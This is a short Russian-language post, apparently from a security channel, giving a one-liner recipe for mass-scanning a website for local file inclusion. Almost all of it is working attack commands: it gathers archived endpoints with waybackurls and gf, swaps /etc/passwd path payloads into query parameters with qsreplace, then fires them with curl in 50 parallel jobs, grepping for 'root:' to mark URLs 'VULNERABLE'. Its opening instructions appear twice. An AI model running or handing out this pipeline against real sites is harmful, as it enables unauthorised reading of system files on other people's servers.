📂 Быстрая проверка сайта на простой LFI
Находим список слов для вывода
Затем, с помощью waybackurls получаем конечные точки нашего сайта и выбираем наиболее подходящие для LFI с помощью gf:
Находим список слов для вывода
/etc/passwd и помещаем в файл payloads.txt.Затем, с помощью waybackurls получаем конечные точки нашего сайта и выбираем наиболее подходящие для LFI с помощью gf:
echo target.com | waybackurls | gf lfi | anew -q lfi.txt
Создаём список конечных точек с полезной нагрузкой в качестве параметра с помощью qsreplace:cat payloads.txt | while read -r line; do cat lfi.txt | qsreplace "$line" | anew -q lfipatterns.txt; done
Запускаем команду для проверки ответа сервера на наличие LFI:cat lfipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"root:\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #lfi